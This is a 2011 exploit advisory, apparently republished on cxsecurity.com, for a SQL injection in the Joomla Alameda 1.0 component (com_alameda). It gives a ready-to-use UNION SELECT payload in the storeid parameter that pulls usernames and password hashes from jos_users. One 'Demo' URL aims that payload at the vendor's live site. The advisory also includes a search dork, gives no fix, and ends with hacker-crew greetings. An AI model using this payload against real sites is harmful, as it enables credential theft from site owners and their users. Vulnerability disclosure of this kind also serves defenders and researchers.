Joomla Alameda 1.0 SQL Injection

2011.11.01
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[~] Joomla Component Alameda (com_alameda) SQL Injection Vulnerability [~] Author : kaMtiEz (kamtiez@exploit-id.com) [~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id [~] Date : 1 Nov , 2011 [ Software Information ] [+] Vendor : http://www.blueflyingfish.com/alameda/ [+] INFO : http://extensions.joomla.org/extensions/e-commerce/e-commerce-bridges/18018 [+] Download : http://www.blueflyingfish.com/alameda/index.php?option=com_content&view=article&id=3 [+] version : 1.0 [+] Vulnerability : SQL INJECTION [+] Dork : "CiHuY" [+] LOCATION : - INDONESIA - [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=1[SQL] [ XpL ] http://127.0.0.1/[kaMtiEz]/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- [ Demo ] http://www.blueflyingfish.com/alameda/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- [ FIX ] dunno :"> [ Thx TO ] [+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9 [+] Tukulesto,arianom,el-farhatz,Jundab,ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,n4kuLa,t3ll0 [+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpret0,Dr. Cruzz [+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz,pinpinbo dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D [ NOTE ] [+] Jika kau mengambil sebuah keputusan maka kau tidak boleh menyesalinya :-) [+] be yourself ;) [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top